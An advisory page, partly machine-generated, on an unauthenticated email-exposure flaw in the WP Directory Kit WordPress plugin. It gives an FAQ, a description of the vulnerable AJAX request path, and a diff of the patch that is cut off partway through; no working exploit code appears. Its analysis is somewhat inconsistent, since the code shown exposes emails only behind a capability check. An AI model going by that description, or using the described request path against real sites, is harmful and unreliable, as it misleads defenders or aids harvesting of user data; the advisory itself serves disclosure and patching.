What is CVE-2025-13920?

CVE-2025-13920 is a medium severity vulnerability in the WP Directory Kit plugin for WordPress, affecting versions up to 1.4.9. It allows unauthenticated attackers to extract email addresses of users with specific roles through the wdk_public_action AJAX handler.

How does this vulnerability work?

The vulnerability exists because the AJAX handler does not require user authentication before executing queries that expose email addresses. Attackers can send crafted requests to the AJAX endpoint to retrieve user data, including email addresses, by manipulating the request parameters.

Who is affected by this vulnerability?

All users of the WP Directory Kit plugin who are running versions 1.4.9 or earlier are affected. This includes any WordPress site utilizing this plugin, particularly those with users that have Directory Kit-specific roles.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Directory Kit plugin installed. If it is version 1.4.9 or earlier, your site is at risk. Additionally, you can review the AJAX requests to see if sensitive user data can be accessed without authentication.

How can I fix this vulnerability?

To mitigate this vulnerability, update the WP Directory Kit plugin to version 1.5.0 or later, which contains the necessary patch. The patch removes the code responsible for exposing email addresses, thereby eliminating the risk of unauthorized access.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium level of severity for this vulnerability. This means that while exploitation is possible, it requires certain conditions to be met, such as the attacker being able to send crafted requests to the server.

What practical risks does this vulnerability pose?

The main risk is the exposure of user email addresses, which can lead to targeted phishing attacks, spam, and social engineering attempts. While it does not allow for direct system compromise, the privacy violation could have regulatory implications under laws like GDPR.

What is the proof of concept for this vulnerability?

The proof of concept is a PHP script that demonstrates how an attacker can exploit the vulnerability. It shows how to send a crafted request to the vulnerable AJAX endpoint to retrieve user email addresses without authentication, highlighting the ease of exploitation.

What changes were made in the patch?

The patch for CVE-2025-13920 comments out the lines of code that appended email addresses to the response based on user capabilities. This prevents email addresses from being included in any AJAX responses, effectively mitigating the exposure risk.

Is there a way to further secure my site beyond the patch?

In addition to applying the patch, consider implementing security measures such as limiting AJAX access to authenticated users, monitoring user roles and permissions, and regularly updating all plugins to their latest versions to reduce vulnerabilities.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the WP Directory Kit plugin temporarily to prevent exploitation. Additionally, review server logs for any unusual AJAX requests that may indicate attempts to exploit the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13920: WP Directory Kit <= 1.4.9 – Unauthenticated Email Exposure via wdk_public_action (wpdirectorykit)

CVE ID CVE-2025-13920

Plugin wpdirectorykit

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.4.9

Patched Version 1.5.0

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13920:
This vulnerability is an unauthenticated sensitive information exposure in the WP Directory Kit WordPress plugin. The flaw resides in the plugin’s AJAX handler, allowing attackers to extract email addresses for users with Directory Kit-specific roles. The CVSS score of 5.3 reflects the moderate impact of this data disclosure.

Atomic Edge research identifies the root cause in the `Wdk_frontendajax.php` controller file. The `wdk_public_action` AJAX handler processes requests at lines 293-340. The vulnerability occurs because the code checks for the `wdk_listings_manage` capability using `current_user_can()` but does not verify user authentication before executing the query. The conditional statements at lines 295-296 and 333-334 expose user email addresses only to users with this specific capability, but the surrounding code executes database queries regardless of authentication status.

Attackers exploit this vulnerability by sending a crafted POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wdk_public_action`. The request must include specific parameters that trigger the vulnerable code path, particularly targeting user data queries. The exploit leverages the plugin’s search or autocomplete functionality to retrieve user records containing email addresses. Attackers can enumerate users with Directory Kit roles by manipulating query parameters to return user data through the AJAX endpoint.

The patch completely removes the email exposure functionality by commenting out the vulnerable code sections. In `Wdk_frontendajax.php`, lines 295-296 and 333-334 are converted to comments, preventing email addresses from being appended to query results. The patch does not add authentication checks but eliminates the data exposure entirely. Before the patch, the code conditionally appended email addresses to user data based on capability checks. After the patch, email addresses are never included in the response, regardless of user permissions.

Successful exploitation allows unauthenticated attackers to harvest email addresses for all users with Directory Kit-specific roles. This exposure enables targeted phishing campaigns, spam distribution, and user enumeration attacks. The leaked email addresses can facilitate social engineering attacks against website administrators, listing managers, and other privileged users. While the vulnerability does not permit direct system compromise, the exposed personal information represents a significant privacy violation under regulations like GDPR.

Differential between vulnerable and patched code

Code Diff

--- a/wpdirectorykit/application/controllers/Wdk_frontendajax.php
+++ b/wpdirectorykit/application/controllers/Wdk_frontendajax.php
@@ -293,8 +293,8 @@
 					$results[$ind_order]['value'] = $level_gen
 												.'#'.wmvc_show_data($attr_id, $row).', '.wmvc_show_data('display_name', $row);

-					if(current_user_can('wdk_listings_manage'))
-						$results[$ind_order]['value'] .= ' ('.wmvc_show_data('user_email', $row).')';
+					//if(current_user_can('wdk_listings_manage'))
+					//	$results[$ind_order]['value'] .= ' ('.wmvc_show_data('user_email', $row).')';
 				} elseif($table == 'icons_list') {
 					$results[$ind_order]['key'] = $row;
 					if(defined('ELEMENTOR_ASSETS_URL')){
@@ -333,8 +333,6 @@
 				$data['curr_val'] = $level_gen
 											.wmvc_show_data('display_name', $row);

-				if(current_user_can('wdk_listings_manage'))
-					$data['curr_val'] .= ' ('.wmvc_show_data('user_email', $row).')'.' #'.wmvc_show_data($attr_id, $row);
 			} else {
 				$data['curr_val'] = $level_gen
 							.esc_html__(wmvc_show_data(wmvc_show_data('attribute_value', $parameters), $row), 'wpdirectorykit');
--- a/wpdirectorykit/application/views/wdk_addons/index.php
+++ b/wpdirectorykit/application/views/wdk_addons/index.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * The template for Subscription / Addons.
  *
@@ -6,8 +7,8 @@
  *
  */

-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
+if (! defined('ABSPATH')) {
+    exit; // Exit if accessed directly.
 }
 ?>
 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
@@ -17,7 +18,6 @@
     <div class="wdk-pricing">
         <div class="wdk-sec-header">
             <h2 class="wdk-sec-title">
-                <span class="mark up"><?php echo esc_html__('SAVE MONEY!', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('Get all', 'wpdirectorykit'); ?>
                 <span class="mark"><?php echo esc_html__('addons and premium', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('support from 8.25$/month in yearly subscription', 'wpdirectorykit'); ?>
@@ -28,7 +28,7 @@
                 <div class="wdk-pac">
                     <div class="header">
                         <h4><?php echo esc_html__('Starter', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>19<span class="after"></span></span></div>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>19.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -38,31 +38,31 @@
                         <li class="item"><?php echo esc_html__('1 month Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 month Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?monthly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=monthly" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac featured">
                     <div class="header">
-                        <h4><?php echo esc_html__('Serious', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>49<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>99.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
                         <li class="item"><?php echo esc_html__('All Our Themes', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?quarterly=true" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac">
                     <div class="header">
-                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>99<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Lifetime', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>199.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -70,83 +70,83 @@
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('Lifetime Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?yearly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=lifetime" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
         </div>
     </div>

     <h1 class="wp-heading-inline"><?php echo __('Addons', 'wpdirectorykit'); ?></h1>
-    <br style="clear:both"/>
-    <br style="clear:both"/>
+    <br style="clear:both" />
+    <br style="clear:both" />
     <div class="wp-list-table widefat plugin-install">
         <div id="the-list">
-            <?php foreach ($addons as $addon):?>
-            <div class="plugin-card plugin-card-classic-editor">
-                <div class="plugin-card-top">
-                    <div class="name column-name">
-                        <h3>
-                            <a target="_blank" href="<?php echo esc_url(wmvc_show_data('link', $addon));?>" class="open-plugin-details-modal">
-                                <?php echo esc_html(wmvc_show_data('title', $addon));?>
-                                <img style="object-fit: contain;object-position: top;" src="<?php echo esc_url(wmvc_show_data('thumbnail', $addon));?>" class="plugin-icon" alt="<?php echo esc_html(wmvc_show_data('title', $addon));?>">
-                            </a>
-                        </h3>
-                    </div>
-                    <div class="action-links">
-                        <ul class="plugin-action-buttons">
-                            <li>
-                                <?php if(wmvc_show_data('is_activated_slug', $addon, false) && function_exists(wmvc_show_data('is_activated_slug', $addon))):?>
-                                    <button type="button" class="button button-disabled" disabled="disabled"><?php echo esc_html__('Active', 'wpdirectorykit'); ?></button>
-                                <?php elseif(wmvc_show_data('is_exists_slug', $addon, false) && file_exists(WP_PLUGIN_DIR.'/'.wmvc_show_data('is_exists_slug', $addon))):?>
-                                    <?php
-                                    $activate_url = add_query_arg(
-                                        array(
-                                            '_wpnonce' => wp_create_nonce( 'activate-plugin_' . wmvc_show_data('is_exists_slug', $addon, false) ),
-                                            'action'   => 'activate',
-                                            'plugin'   => wmvc_show_data('is_exists_slug', $addon, false),
-                                        ),
-                                        network_admin_url( 'plugins.php' )
-                                    );
-                                    ?>
-                                    <a class="button activate-now" href="<?php echo esc_url($activate_url);?>"><?php echo esc_html__('Activate', 'wpdirectorykit'); ?></a>
-                                <?php else:?>
-                                    <?php if(file_exists(get_stylesheet_directory() .'/addons/'.substr(basename(wmvc_show_data('is_exists_slug', $addon)), 0, -4).'.zip')):?>
-                                        <a target="_blank" class="install-now button btn-danger" data-slug="classic-editor" href="<?php echo esc_url(wdk_get_tgmpa_link());?>" title="<?php echo esc_html(wmvc_show_data('title', $addon));?>"><?php echo esc_html__('Activate', 'wpdirectorykit'); ?></a>
-                                    <?php elseif(stripos(wmvc_show_data('link_info', $addon), 'sweet-energy-efficiency') === FALSE):?>
-                                        <a target="_blank" class="install-now button btn-danger" data-slug="classic-editor" href="<?php echo esc_url(wmvc_show_data('link', $addon));?>" title="<?php echo esc_html(wmvc_show_data('title', $addon));?>"><?php echo esc_html__('Buy Now', 'wpdirectorykit'); ?></a>
-                                    <?php else:?>
-                                        <a target="_blank" class="install-now button btn-info" data-slug="classic-editor" href="<?php echo esc_url(wmvc_show_data('link', $addon));?>" title="<?php echo esc_html(wmvc_show_data('title', $addon));?>"><?php echo esc_html__('Download Free', 'wpdirectorykit'); ?></a>
-                                    <?php endif;?>
-                                <?php endif;?>
-                            </li>
-                            <li><a target="_blank" href="<?php echo esc_url(wmvc_show_data('link_info', $addon));?>" class="open-plugin-details-modal"><?php echo esc_html__('More Details', 'wpdirectorykit'); ?></a></li>
-                        </ul>
-                    </div>
-                    <div class="desc column-description">
-                        <p><?php echo esc_html(wmvc_show_data('description', $addon));?></p>
-                        <p class="authors"><cite><?php echo esc_html__('By', 'wpdirectorykit'); ?> <a target="_blank" href="https://wpdirectorykit.com/"><?php echo esc_html__('WP Directory Kit', 'wpdirectorykit'); ?></a></cite></p>
+            <?php foreach ($addons as $addon): ?>
+                <div class="plugin-card plugin-card-classic-editor">
+                    <div class="plugin-card-top">
+                        <div class="name column-name">
+                            <h3>
+                                <a target="_blank" href="<?php echo esc_url(wmvc_show_data('link', $addon)); ?>" class="open-plugin-details-modal">
+                                    <?php echo esc_html(wmvc_show_data('title', $addon)); ?>
+                                    <img style="object-fit: contain;object-position: top;" src="<?php echo esc_url(wmvc_show_data('thumbnail', $addon)); ?>" class="plugin-icon" alt="<?php echo esc_html(wmvc_show_data('title', $addon)); ?>">
+                                </a>
+                            </h3>
+                        </div>
+                        <div class="action-links">
+                            <ul class="plugin-action-buttons">
+                                <li>
+                                    <?php if (wmvc_show_data('is_activated_slug', $addon, false) && function_exists(wmvc_show_data('is_activated_slug', $addon))): ?>
+                                        <button type="button" class="button button-disabled" disabled="disabled"><?php echo esc_html__('Active', 'wpdirectorykit'); ?></button>
+                                    <?php elseif (wmvc_show_data('is_exists_slug', $addon, false) && file_exists(WP_PLUGIN_DIR . '/' . wmvc_show_data('is_exists_slug', $addon))): ?>
+                                        <?php
+                                        $activate_url = add_query_arg(
+                                            array(
+                                                '_wpnonce' => wp_create_nonce('activate-plugin_' . wmvc_show_data('is_exists_slug', $addon, false)),
+                                                'action'   => 'activate',
+                                                'plugin'   => wmvc_show_data('is_exists_slug', $addon, false),
+                                            ),
+                                            network_admin_url('plugins.php')
+                                        );
+                                        ?>
+                                        <a class="button activate-now" href="<?php echo esc_url($activate_url); ?>"><?php echo esc_html__('Activate', 'wpdirectorykit'); ?></a>
+                                    <?php else: ?>
+                                        <?php if (file_exists(get_stylesheet_directory() . '/addons/' . substr(basename(wmvc_show_data('is_exists_slug', $addon)), 0, -4) . '.zip')): ?>
+                                            <a target="_blank" class="install-now button btn-danger" data-slug="classic-editor" href="<?php echo esc_url(wdk_get_tgmpa_link()); ?>" title="<?php echo esc_html(wmvc_show_data('title', $addon)); ?>"><?php echo esc_html__('Activate', 'wpdirectorykit'); ?></a>
+                                        <?php elseif (stripos(wmvc_show_data('link_info', $addon), 'sweet-energy-efficiency') === FALSE): ?>
+                                            <a target="_blank" class="install-now button btn-danger" data-slug="classic-editor" href="<?php echo esc_url(wmvc_show_data('link', $addon)); ?>" title="<?php echo esc_html(wmvc_show_data('title', $addon)); ?>"><?php echo esc_html__('Buy Now', 'wpdirectorykit'); ?></a>
+                                        <?php else: ?>
+                                            <a target="_blank" class="install-now button btn-info" data-slug="classic-editor" href="<?php echo esc_url(wmvc_show_data('link', $addon)); ?>" title="<?php echo esc_html(wmvc_show_data('title', $addon)); ?>"><?php echo esc_html__('Download Free', 'wpdirectorykit'); ?></a>
+                                        <?php endif; ?>
+                                    <?php endif; ?>
+                                </li>
+                                <li><a target="_blank" href="<?php echo esc_url(wmvc_show_data('link_info', $addon)); ?>" class="open-plugin-details-modal"><?php echo esc_html__('More Details', 'wpdirectorykit'); ?></a></li>
+                            </ul>
+                        </div>
+                        <div class="desc column-description">
+                            <p><?php echo esc_html(wmvc_show_data('description', $addon)); ?></p>
+                            <p class="authors"><cite><?php echo esc_html__('By', 'wpdirectorykit'); ?> <a target="_blank" href="https://wpdirectorykit.com/"><?php echo esc_html__('WP Directory Kit', 'wpdirectorykit'); ?></a></cite></p>
+                        </div>
                     </div>
                 </div>
-            </div>
-            <?php endforeach;?>
-            <br style="clear:both"/>
+            <?php endforeach; ?>
+            <br style="clear:both" />
         </div>
-        <br style="clear:both"/>
+        <br style="clear:both" />
         <div class="text-center">
-            <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit');?></a>
+            <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit'); ?></a>
         </div>
-
+

     </div>
 </div>


 <script>
-jQuery(document).ready(function($) {
+    jQuery(document).ready(function($) {

-})
+    })
 </script>

 <?php $this->view('general/footer', $data); ?>
 No newline at end of file
--- a/wpdirectorykit/application/views/wdk_addons_bookings/index.php
+++ b/wpdirectorykit/application/views/wdk_addons_bookings/index.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * The template for Booking presentation.
  *
@@ -6,8 +7,8 @@
  *
  */

-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
+if (! defined('ABSPATH')) {
+    exit; // Exit if accessed directly.
 }
 ?>
 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
@@ -39,7 +40,6 @@
     <div class="wdk-pricing">
         <div class="wdk-sec-header">
             <h2 class="wdk-sec-title">
-                <span class="mark up"><?php echo esc_html__('SAVE MONEY!', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('Get all', 'wpdirectorykit'); ?>
                 <span class="mark"><?php echo esc_html__('addons and premium', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('support from 8.25$/month in yearly subscription', 'wpdirectorykit'); ?>
@@ -50,7 +50,7 @@
                 <div class="wdk-pac">
                     <div class="header">
                         <h4><?php echo esc_html__('Starter', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>19<span class="after"></span></span></div>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>19.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -60,31 +60,31 @@
                         <li class="item"><?php echo esc_html__('1 month Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 month Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?monthly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=monthly" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac featured">
                     <div class="header">
-                        <h4><?php echo esc_html__('Serious', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>49<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>99.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
                         <li class="item"><?php echo esc_html__('All Our Themes', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?quarterly=true" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac">
                     <div class="header">
-                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>99<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Lifetime', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>199.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -92,58 +92,52 @@
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('Lifetime Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?yearly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=lifetime" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
         </div>
     </div>
-
+
+
     <div class="text-center">
-        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit');?></a>
+        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit'); ?></a>
     </div>
 </div>


 <script>
-jQuery(document).ready(function($) {
+    jQuery(document).ready(function($) {

-})
+    })
 </script>

 <style>
-
-img.presentation-image
-{
-    max-width:600px;
-    max-height:600px;
-}
-
-h2
-{
-    font-size: 25px;
-    color: #010b44;
-}
-
-p.presentation-desc
-{
-    padding:5px 0px;
-    margin:0px;
-    font-size: 18px;
-}
-
-a.image-link
-{
-    display: inline-block;
-    border: 3px solid white;
-}
-
-a.image-link:hover
-{
-    border: 3px solid #506690;
-}
-
+    img.presentation-image {
+        max-width: 600px;
+        max-height: 600px;
+    }
+
+    h2 {
+        font-size: 25px;
+        color: #010b44;
+    }
+
+    p.presentation-desc {
+        padding: 5px 0px;
+        margin: 0px;
+        font-size: 18px;
+    }
+
+    a.image-link {
+        display: inline-block;
+        border: 3px solid white;
+    }
+
+    a.image-link:hover {
+        border: 3px solid #506690;
+    }
 </style>

 <?php $this->view('general/footer', $data); ?>
 No newline at end of file
--- a/wpdirectorykit/application/views/wdk_addons_currencies/index.php
+++ b/wpdirectorykit/application/views/wdk_addons_currencies/index.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * The template for Currencies conversion presentation.
  *
@@ -6,8 +7,8 @@
  *
  */

-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
+if (! defined('ABSPATH')) {
+    exit; // Exit if accessed directly.
 }
 ?>
 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
@@ -32,7 +33,6 @@
     <div class="wdk-pricing">
         <div class="wdk-sec-header">
             <h2 class="wdk-sec-title">
-                <span class="mark up"><?php echo esc_html__('SAVE MONEY!', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('Get all', 'wpdirectorykit'); ?>
                 <span class="mark"><?php echo esc_html__('addons and premium', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('support from 8.25$/month in yearly subscription', 'wpdirectorykit'); ?>
@@ -43,7 +43,7 @@
                 <div class="wdk-pac">
                     <div class="header">
                         <h4><?php echo esc_html__('Starter', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>19<span class="after"></span></span></div>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>19.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -53,31 +53,31 @@
                         <li class="item"><?php echo esc_html__('1 month Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 month Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?monthly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=monthly" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac featured">
                     <div class="header">
-                        <h4><?php echo esc_html__('Serious', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>49<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>99.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
                         <li class="item"><?php echo esc_html__('All Our Themes', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?quarterly=true" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac">
                     <div class="header">
-                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>99<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Lifetime', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>199.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -85,58 +85,52 @@
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('Lifetime Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?yearly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
